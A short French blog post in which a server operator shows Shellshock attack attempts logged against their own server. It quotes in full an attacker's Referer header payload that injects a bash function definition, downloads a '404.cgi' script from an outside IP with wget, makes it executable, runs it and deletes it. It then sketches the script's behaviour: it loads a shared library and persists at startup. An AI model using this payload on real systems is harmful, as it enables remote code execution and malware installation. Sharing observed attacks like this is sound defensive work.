Exploitation de ShellShock sur Dyrk
Pour les curieux de la faille shellshock, voici quelques type d'exploitation que certaine personne emploies pour essayer de faire tomber mon serveur :
L'attaquant forge une requête curl ou il indique au referer d'être :
() { :; };
echo Content-type:text/plain;
echo;
echo;
echo M`expr 1330 7`H;
wget -O /tmp/404.cgi http://195.154.184.150/404.cgi;
chmod 755 /tmp/404.cgi;
/tmp/404.cgi;
rm -rf /tmp/404.cgi*
On constate alors que c'est un serveur de chez free qui est employé pour faire l'attaque, le "pirate" essaie donc de télécharger un fichier "404.cgi" à qui il donne les bons droits l’exécute, et le supprime.
http://195.154.184.150/404.cgi
Quand on regarde un peu ce que fait ce fameux script, bon je vais globaliser sans investiguer plus, mais au premier coup d'oeil, il stock en variable 2 librairie (.so)
Il check le système et load le bon .so en fonction.
Comme d'hab' il se préload au chargement .. rc.load ^^
Et modifie 2/3 variable d'environnement ^^